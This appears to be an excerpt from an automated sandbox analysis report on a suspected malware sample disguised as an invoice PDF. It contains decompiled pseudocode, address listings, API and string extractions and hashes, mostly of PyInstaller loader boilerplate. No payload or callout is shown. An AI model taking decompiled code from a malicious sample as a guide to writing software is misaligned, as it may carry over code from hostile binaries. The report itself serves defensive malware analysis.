																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E01321798();
																																		asm("int3");
																																		_push(_t319);
																																		_push(_t223);
																																		_push(_t307);
																																		_push(_t292);
																																		_t293 =  *0x13460bc; // 0xe55920
																																		_t308 = _t293;
																																		__eflags =  *_t293;
																																		if( *_t293 == 0) {
																																			L127:
																																			_t309 = _t308 - _t293;
																																			__eflags = _t309;
																																			_t311 =  ~(_t309 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E0132C265(_v12,  *_t308, _t225);
																																				_t324 = _t324 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t308));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t311 = _t308 - _t293 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t308 =  &(_t308[1]);
																																				__eflags =  *_t308;
																																			} while ( *_t308 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t311;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t292 = _t292 + 4;
																																__eflags =  *_t292 - _t173;
																															} while ( *_t292 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t291 = _t291 + 4;
																										__eflags =  *_t291 - _t180;
																									} while ( *_t291 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t305[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t305,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = E0131C9CE();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x13460bc; // 0xe55920
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x13460c0 = E01320B10(_t246, 1, 4);
																				E013209EB(_t221);
																				_t323 = _t323 + 0xc;
																				goto L63;
																			} else {
																				 *0x13460bc = E01320B10(_t246, 1, 4);
																				E013209EB(_t221);
																				_t323 = _t323 + 0xc;
																				__eflags =  *0x13460bc - _t221; // 0xe55920
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t303 =  *0x13460c0; // 0xe44410
																					__eflags = _t303;
																					if(_t303 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0131FF04(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t303 =  *0x13460c0; // 0xe44410
																				__eflags = _t303;
																				if(_t303 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E013209EB(_t289);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0131C9CE();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t301 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t301,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0131C9CE();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x13460bc = E01320B10(_t231, 1, 4);
										E013209EB(_t218);
										_t299 =  *0x13460bc; // 0xe55920
										_t321 = _t321 + 0xc;
										__eflags = _t299;
										if(_t299 == 0) {
											goto L11;
										} else {
											__eflags =  *0x13460c0 - _t218; // 0xe44410
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x13460c0 = E01320B10(_t231, 1, 4);
												E013209EB(_t218);
												_t321 = _t321 + 0xc;
												__eflags =  *0x13460c0 - _t218; // 0xe44410
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x13460c0 - _t218; // 0xe44410
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0131FEFF(0, _t283);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t299 =  *0x13460bc; // 0xe55920
											L20:
											__eflags = _t299;
											if(_t299 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E013209EB(_t287);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0131C9CE();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}









































































































                            0x013261f0
                            0x013261f9
                            0x013261fe
                            0x01326215
                            0x01326217
                            0x0132621c
                            0x01326220
                            0x01326221
                            0x01326223
                            0x01326273
                            0x01326278
                            0x00000000
                            0x01326225
                            0x01326225
                            0x01326227
                            0x00000000
                            0x01326229
                            0x01326229
                            0x0132622d
                            0x01326233
                            0x01326236
                            0x01326239
                            0x0132623f
                            0x01326242
                            0x01326247
                            0x01326249
                            0x0132624c
                            0x0132624d
                            0x0132624d
                            0x01326253
                            0x01326255
                            0x01326257
                            0x013262eb
                            0x013262ee
                            0x013262f0
                            0x013262f2
                            0x013262f3
                            0x013262f4
                            0x013262f9
                            0x013262fe
                            0x01326300
                            0x0132634a
                            0x0132634a
                            0x0132634d
                            0x00000000
                            0x01326353
                            0x01326353
                            0x01326355
                            0x01326358
                            0x01326358
                            0x0132635b
                            0x0132635d
                            0x00000000
                            0x01326363
                            0x01326363
                            0x01326369
                            0x00000000
                            0x0132636f
                            0x0132636f
                            0x01326371
                            0x01326379
                            0x0132637b
                            0x01326380
                            0x01326383
                            0x01326385
                            0x00000000
                            0x0132638b
                            0x0132638b
                            0x0132638e
                            0x01326390
                            0x01326393
                            0x01326396
                            0x00000000
                            0x01326396
                            0x01326385
                            0x01326369
                            0x0132635d
                            0x01326302
                            0x01326302
                            0x01326304
                            0x00000000
                            0x01326306
                            0x01326309
                            0x0132630f
                            0x01326312
                            0x01326315
                            0x01326329
                            0x01326329
                            0x0132632c
                            0x00000000
                            0x00000000
                            0x01326325
                            0x01326328
                            0x01326328
                            0x01326328
                            0x0132632e
                            0x01326330
                            0x01326338
                            0x0132633a
                            0x0132633f
                            0x01326342
                            0x01326344
                            0x01326346
                            0x0132639a
                            0x0132639a
                            0x0132639a
                            0x01326317
                            0x01326317
                            0x0132631a
                            0x0132631c
                            0x0132631c
                            0x013263a0
                            0x013263a3
                            0x00000000
                            0x013263a9
                            0x013263a9
                            0x013263ab
                            0x013263ae
                            0x013263ae
                            0x013263b0
                            0x013263b1
                            0x013263b1
                            0x013263bd
                            0x013263c5
                            0x013263c8
                            0x013263c9
                            0x013263cb
                            0x01326414
                            0x01326415
                            0x00000000
                            0x013263cd
                            0x013263d4
                            0x013263d9
                            0x013263dc
                            0x013263de
                            0x01326420
                            0x01326421
                            0x01326422
                            0x01326423
                            0x01326424
                            0x01326425
                            0x0132642a
                            0x0132642e
                            0x01326430
                            0x01326433
                            0x01326434
                            0x01326437
                            0x01326439
                            0x0132644b
                            0x0132644c
                            0x0132644d
                            0x01326450
                            0x01326452
                            0x01326457
                            0x0132645b
                            0x0132645c
                            0x0132645e
                            0x013264af
                            0x013264b4
                            0x00000000
                            0x01326460
                            0x01326460
                            0x01326462
                            0x00000000
                            0x01326464
                            0x01326464
                            0x0132646a
                            0x0132646c
                            0x01326470
                            0x01326473
                            0x01326476
                            0x0132647c
                            0x0132647e
                            0x0132647f
                            0x01326485
                            0x01326488
                            0x0132648a
                            0x0132648a
                            0x01326490
                            0x01326492
                            0x0132651f
                            0x0132652a
                            0x0132652d
                            0x01326532
                            0x01326537
                            0x01326539
                            0x01326583
                            0x01326583
                            0x01326586
                            0x00000000
                            0x0132658c
                            0x0132658c
                            0x0132658e
                            0x01326591
                            0x01326591
                            0x01326594
                            0x01326596
                            0x00000000
                            0x0132659c
                            0x0132659c
                            0x013265a2
                            0x00000000
                            0x013265a8
                            0x013265a8
                            0x013265aa
                            0x013265b2
                            0x013265b4
                            0x013265b9
                            0x013265bc
                            0x013265be
                            0x00000000
                            0x013265c4
                            0x013265c4
                            0x013265c7
                            0x013265c9
                            0x013265cc
                            0x013265cf
                            0x00000000
                            0x013265cf
                            0x013265be
                            0x013265a2
                            0x01326596
                            0x0132653b
                            0x0132653b
                            0x0132653d
                            0x00000000
                            0x0132653f
                            0x01326542
                            0x01326548
                            0x0132654b
                            0x0132654e
                            0x01326562
                            0x01326562
                            0x01326565
                            0x00000000
                            0x00000000
                            0x0132655e
                            0x01326561
                            0x01326561
                            0x01326561
                            0x01326567
                            0x01326569
                            0x01326571
                            0x01326573
                            0x01326578
                            0x0132657b
                            0x0132657d
                            0x0132657f
                            0x013265d3
                            0x013265d3
                            0x013265d3
                            0x01326550
                            0x01326550
                            0x01326553
                            0x01326555
                            0x01326555
                            0x013265d9
                            0x013265dc
                            0x00000000
                            0x013265e2
                            0x013265e2
                            0x013265e4
                            0x013265e4
                            0x013265e7
                            0x013265e7
                            0x013265ea
                            0x013265ed
                            0x013265ed
                            0x013265f8
                            0x013265fc
                            0x01326604
                            0x01326607
                            0x01326608
                            0x0132660a
                            0x01326651
                            0x01326652
                            0x00000000
                            0x0132660c
                            0x01326614
                            0x01326619
                            0x0132661c
                            0x0132661e
                            0x0132665d
                            0x0132665e
                            0x0132665f
                            0x01326660
                            0x01326661
                            0x01326662
                            0x01326667
                            0x0132666a
                            0x0132666b
                            0x0132666e
                            0x0132666f
                            0x01326672
                            0x01326674
                            0x0132667d
                            0x0132667f
                            0x01326681
                            0x01326683
                            0x01326685
                            0x01326685
                            0x01326688
                            0x01326689
                            0x01326689
                            0x01326685
                            0x0132668f
                            0x0132669a
                            0x0132669d
                            0x0132669e
                            0x013266a0
                            0x01326707
                            0x01326707
                            0x00000000
                            0x013266a2
                            0x013266a2
                            0x013266a5
                            0x013266f7
                            0x013266f9
                            0x013266ff
                            0x00000000
                            0x013266a7
                            0x013266a7
                            0x013266aa
                            0x013266aa
                            0x013266ac
                            0x013266ac
                            0x013266ae
                            0x013266ae
                            0x013266b1
                            0x013266b1
                            0x013266b3
                            0x013266b4
                            0x013266b4
                            0x013266b8
                            0x013266bc
                            0x013266c0
                            0x013266ca
                            0x013266cd
                            0x013266d2
                            0x013266d5
                            0x013266d9
                            0x00000000
                            0x013266db
                            0x013266e3
                            0x013266e8
                            0x013266eb
                            0x013266ed
                            0x0132670c
                            0x0132670e
                            0x0132670f
                            0x01326710
                            0x01326711
                            0x01326712
                            0x01326713
                            0x01326718
                            0x0132671b
                            0x0132671c
                            0x0132671e
                            0x0132671f
                            0x01326720
                            0x01326721
                            0x01326724
                            0x01326726
                            0x0132672f
                            0x01326730
                            0x01326732
                            0x01326734
                            0x01326736
                            0x01326739
                            0x0132673a
                            0x0132673c
                            0x0132673e
                            0x0132673e
                            0x01326741
                            0x01326742
                            0x01326742
                            0x0132673e
                            0x01326746
                            0x01326751
                            0x01326755
                            0x01326757
                            0x013267c5
                            0x013267c5
                            0x00000000
                            0x01326759
                            0x01326759
                            0x0132675b
                            0x013267b5
                            0x013267b6
                            0x013267bc
                            0x00000000
                            0x0132675d
                            0x0132675f
                            0x0132675f
                            0x01326761
                            0x01326761
                            0x01326763
                            0x01326763
                            0x01326766
                            0x01326766
                            0x01326769
                            0x0132676c
                            0x0132676c
                            0x01326778
                            0x0132677c
                            0x01326784
                            0x0132678a
                            0x0132678f
                            0x01326792
                            0x01326796
                            0x00000000
                            0x01326798
                            0x013267a0
                            0x013267a5
                            0x013267a8
                            0x013267aa
                            0x013267ca
                            0x013267cc
                            0x013267cd
                            0x013267ce
                            0x013267cf
                            0x013267d0
                            0x013267d1
                            0x013267d6
                            0x013267d9
                            0x013267dc
                            0x013267dd
                            0x013267de
                            0x013267df
                            0x013267e5
                            0x013267e7
                            0x013267ea
                            0x01326816
                            0x01326816
                            0x01326816
                            0x0132681b
                            0x013267ec
                            0x013267ec
                            0x013267ef
                            0x013267f5
                            0x013267fa
                            0x013267fd
                            0x013267ff
                            0x00000000
                            0x01326801
                            0x01326803
                            0x01326806
                            0x01326808
                            0x01326824
                            0x01326826
                            0x0132680a
                            0x0132680a
                            0x0132680c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132680c
                            0x01326808
                            0x00000000
                            0x0132680e
                            0x0132680e
                            0x01326811
                            0x01326811
                            0x00000000
                            0x013267ef
                            0x0132681d
                            0x01326823
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013267aa
                            0x00000000
                            0x013267ac
                            0x013267ac
                            0x013267af
                            0x013267af
                            0x013267b3
                            0x013267b3
                            0x00000000
                            0x013267b3
                            0x0132675b
                            0x01326728
                            0x01326728
                            0x013267c0
                            0x013267c4
                            0x013267c4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013266ed
                            0x00000000
                            0x013266ef
                            0x013266ef
                            0x013266f2
                            0x013266f2
                            0x00000000
                            0x013266f6
                            0x013266a5
                            0x01326676
                            0x01326676
                            0x01326702
                            0x01326706
                            0x01326706
                            0x01326620
                            0x01326624
                            0x01326627
                            0x01326631
                            0x01326639
                            0x0132663f
                            0x01326641
                            0x01326643
                            0x01326648
                            0x01326648
                            0x0132664b
                            0x0132664b
                            0x00000000
                            0x01326641
                            0x0132661e
                            0x0132660a
                            0x013265dc
                            0x0132653d
                            0x01326498
                            0x01326498
                            0x0132649d
                            0x013264a0
                            0x013264cd
                            0x013264cd
                            0x013264cf
                            0x00000000
                            0x013264d1
                            0x013264d1
                            0x013264d3
                            0x013264fe
                            0x01326508
                            0x0132650d
                            0x01326512
                            0x00000000
                            0x013264d5
                            0x013264df
                            0x013264e4
                            0x013264e9
                            0x013264ec
                            0x013264f2
                            0x00000000
                            0x013264f4
                            0x013264f4
                            0x013264fa
                            0x013264fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264fc
                            0x013264f2
                            0x013264d3
                            0x013264a2
                            0x013264a2
                            0x013264a4
                            0x00000000
                            0x013264a6
                            0x013264a6
                            0x013264ab
                            0x013264ad
                            0x01326515
                            0x01326515
                            0x0132651b
                            0x0132651d
                            0x013264ba
                            0x013264ba
                            0x013264ba
                            0x013264bd
                            0x013264be
                            0x013264c5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013264ad
                            0x013264a4
                            0x013264a0
                            0x01326492
                            0x01326462
                            0x0132643b
                            0x0132643b
                            0x01326440
                            0x01326446
                            0x013264c8
                            0x013264cc
                            0x013264cc
                            0x013263e0
                            0x013263e9
                            0x013263f1
                            0x013263f5
                            0x013263fc
                            0x01326402
                            0x01326404
                            0x01326406
                            0x0132640b
                            0x0132640b
                            0x0132640e
                            0x0132640e
                            0x00000000
                            0x01326404
                            0x013263de
                            0x013263cb
                            0x013263a3
                            0x01326304
                            0x0132625d
                            0x0132625d
                            0x01326260
                            0x01326291
                            0x01326291
                            0x01326293
                            0x013262a3
                            0x013262a8
                            0x013262ad
                            0x013262b3
                            0x013262b6
                            0x013262b8
                            0x00000000
                            0x013262ba
                            0x013262ba
                            0x013262c0
                            0x00000000
                            0x013262c2
                            0x013262cc
                            0x013262d1
                            0x013262d6
                            0x013262d9
                            0x013262df
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013262df
                            0x013262c0
                            0x01326295
                            0x01326295
                            0x00000000
                            0x01326295
                            0x01326262
                            0x01326262
                            0x01326268
                            0x00000000
                            0x0132626a
                            0x0132626a
                            0x0132626f
                            0x01326271
                            0x013262e1
                            0x013262e1
                            0x013262e7
                            0x013262e7
                            0x013262e9
                            0x0132627e
                            0x0132627e
                            0x0132627e
                            0x01326281
                            0x01326282
                            0x01326289
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01326271
                            0x01326268
                            0x01326260
                            0x01326257
                            0x01326227
                            0x01326200
                            0x01326200
                            0x01326205
                            0x0132620b
                            0x0132628c
                            0x01326290
                            0x01326290
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                            • String ID: Y
                            • API String ID: 2719235668-3319100138
                            • Opcode ID: b2d673df09d4a30c581aee2df11971096877d162b04b54a53b9d17d6d6efd602
                            • Instruction ID: 490073615fa8a6f556e13334bee73e99cd3a17d22bebe3cbb8ec7adc5f05c855
                            • Opcode Fuzzy Hash: b2d673df09d4a30c581aee2df11971096877d162b04b54a53b9d17d6d6efd602
                            • Instruction Fuzzy Hash: CCD12AF1A04325ABDB35BF6C9843A6E7BF9AF0271CF04416DEE46A7285DB3199048790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F1E60, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 176COMMON
                            Download Yara Rule
                            APIs
                            • _PyArg_CheckPositional.PYTHON38(is_normalized,?,00000002,00000002), ref: 6E2F1E7A
                            • _PyArg_BadArgument.PYTHON38(is_normalized,argument 1,str), ref: 6E2F1EAD
                            • _PyArg_BadArgument.PYTHON38(is_normalized,argument 2,str,?), ref: 6E2F1F02
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1F31
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F1F6A
                            • PyUnicode_Compare.PYTHON38(?,00000000), ref: 6E2F1FB4
                            • _Py_Dealloc.PYTHON38(-000000FF), ref: 6E2F1FC5
                            • _PyUnicode_EqualToASCIIId.PYTHON38(00000080,6E3F8A34), ref: 6E2F1FDA
                            • _PyUnicode_EqualToASCIIId.PYTHON38(00000080,6E3F837C), ref: 6E2F1FF4
                            • _PyUnicode_EqualToASCIIId.PYTHON38(00000080,6E3F8370), ref: 6E2F2009
                            • PyErr_SetString.PYTHON38(6E79ED94,invalid normalization form), ref: 6E2F2028
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Equal$Arg_$Argument$CheckCompareDeallocErr_PositionalReadyString
                            • String ID: argument 1$argument 2$invalid normalization form$is_normalized$str
                            • API String ID: 3281200949-34262883
                            • Opcode ID: 956e401ec9323314cc38cf991fd10420427ebc74bdaa1558d23b66bd7abfb473
                            • Instruction ID: 4a9e21aa3eb3d57305a5037da9ea00aceda9d79fd8e311c65b76c013b53dcf98
                            • Opcode Fuzzy Hash: 956e401ec9323314cc38cf991fd10420427ebc74bdaa1558d23b66bd7abfb473
                            • Instruction Fuzzy Hash: 955127726A021AEBCB104B989C84A4AF766FF02376F104229FC19D7382D766D857C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01313840, Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                            • Py_SetProgramName.PYTHON38(01342A40,00000000,?,?,00000000,00000000,?,?,?,00000000), ref: 01313877
                            Strings
                            • Failed to convert progname to wchar_t, xrefs: 0131385F
                            • Error detected starting Python VM., xrefs: 01313962
                            • Failed to convert pyhome to wchar_t, xrefs: 0131389A
                            • C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122, xrefs: 013138C8, 013138FA
                            • sys.path (based on %s) exceeds buffer[%d] space, xrefs: 013138E2
                            • %s%cbase_library.zip%c%s, xrefs: 013138BE
                            • Failed to convert pypath to wchar_t, xrefs: 01313910
                            • C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122, xrefs: 013138FF, 01313929, 01313940
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiNameProgramWide
                            • String ID: %s%cbase_library.zip%c%s$C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122$C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip;C:\Users\user\AppData\Local\Temp\_MEI24122$Error detected starting Python VM.$Failed to convert progname to wchar_t$Failed to convert pyhome to wchar_t$Failed to convert pypath to wchar_t$sys.path (based on %s) exceeds buffer[%d] space
                            • API String ID: 1505701705-120043946
                            • Opcode ID: b1718e7f933b0ceceedfb84efd3f2dd8cb71766ba69bd0aa624d1a9c497d2384
                            • Instruction ID: 7256bb6b9cd75f6c55cf886e946c47a398a6a138b29d2a95150f093b66bf6f5c
                            • Opcode Fuzzy Hash: b1718e7f933b0ceceedfb84efd3f2dd8cb71766ba69bd0aa624d1a9c497d2384
                            • Instruction Fuzzy Hash: 6221DB77B5030166F56432BE7C0AFCA36496BD4B7DF041925FA65F02CEFAD0818582A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314740, Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 99libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E01314740(void* __edx, char* _a4) {
				short* _v24;
				intOrPtr _v28;
				char _v32;
				int _t18;
				short* _t23;
				void* _t24;
				void* _t25;
				char* _t26;
				struct HINSTANCE__* _t27;
				int _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;

				_t25 = __edx;
				_t33 =  &_v32;
				_t26 = _a4;
				_t28 = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, 0, 0);
				_t36 = _t28;
				if(_t28 != 0) {
					_t2 = _t28 + 1; // 0x1
					_push(2);
					_t23 = E013197F8(_t24);
					_t33 =  &_v32 + 8;
					__eflags = _t23;
					if(__eflags != 0) {
						__eflags = MultiByteToWideChar(0xfde9, 0, _t26, 0xffffffff, _t23, _t28);
						if(__eflags == 0) {
							_push("Failed to decode wchar_t from UTF-8\n");
							goto L6;
						}
					} else {
						_push("Out of memory.");
						_push("win32_utils_from_utf8");
						goto L7;
					}
				} else {
					_push("Failed to get wchar_t buffer size.\n");
					L6:
					_push("MultiByteToWideChar");
					L7:
					E01311860(_t25, _t36);
					_t33 = _t33 + 8;
					_t23 = 0;
				}
				_t27 = LoadLibraryA("kernel32");
				_t32 = GetProcAddress(_t27, "CreateActCtxW");
				_t30 = GetProcAddress(_t27, "ActivateActCtx");
				if(_t32 == 0 || _t30 == 0) {
					L14:
					__eflags = 0;
					return 0;
				} else {
					asm("xorps xmm0, xmm0");
					asm("movups [esp+0x10], xmm0");
					asm("movups [esp+0x24], xmm0");
					_v32 = 0x20;
					_v24 = _t23;
					_v28 = 0x10;
					 *0x133c000 =  *_t32( &_v32);
					L01319803(_t23);
					_t18 =  *0x133c000; // 0xffffffff
					if(_t18 == 0xffffffff) {
						L13:
						_push(0);
						 *0x133c000 = 0xffffffff;
						E01314860(_t25);
						goto L14;
					} else {
						_push(0x1344a50);
						_push(_t18);
						if( *_t30() == 0) {
							goto L13;
						} else {
							return 1;
						}
					}
				}
			}















                            0x01314740
                            0x01314740
                            0x0131474d
                            0x01314761
                            0x01314763
                            0x01314765
                            0x0131476e
                            0x01314771
                            0x01314779
                            0x0131477b
                            0x0131477e
                            0x01314780
                            0x0131479c
                            0x0131479e
                            0x013147a0
                            0x00000000
                            0x013147a0
                            0x01314782
                            0x01314782
                            0x01314787
                            0x00000000
                            0x01314787
                            0x01314767
                            0x01314767
                            0x013147a5
                            0x013147a5
                            0x013147aa
                            0x013147aa
                            0x013147af
                            0x013147b2
                            0x013147b2
                            0x013147c5
                            0x013147d5
                            0x013147d9
                            0x013147dd
                            0x01314853
                            0x01314853
                            0x01314859
                            0x013147e3
                            0x013147e3
                            0x013147ea
                            0x013147f0
                            0x013147f5
                            0x013147fd
                            0x01314801
                            0x0131480c
                            0x01314811
                            0x01314816
                            0x01314821
                            0x0131483c
                            0x0131483c
                            0x0131483e
                            0x01314848
                            0x00000000
                            0x01314823
                            0x01314823
                            0x01314828
                            0x0131482d
                            0x00000000
                            0x01314832
                            0x0131483b
                            0x0131483b
                            0x0131482d
                            0x01314821

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0131475F
                            • LoadLibraryA.KERNEL32(kernel32,?,?,?,?,?,?,?,?,013121A8,?,?,?,?,01312639,00000000), ref: 013147B9
                            • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 013147CD
                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 013147D7
                              • Part of subcall function 01314860: GetLastError.KERNEL32(013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 01314883
                              • Part of subcall function 01314860: FormatMessageW.KERNEL32(00001000,00000000,?,00000400,00000000,00001000,00000000,013118B9,00000000,?,?,?,00000400,?,00000000,?), ref: 013148A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharErrorFormatLastLibraryLoadMessageMultiWide
                            • String ID: $ActivateActCtx$CreateActCtxW$Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$kernel32$win32_utils_from_utf8
                            • API String ID: 476984482-989751517
                            • Opcode ID: 54b65913799bdf2fc4b5987ce07bc3a9d15899c30ec00fa49752aa9e9844ca41
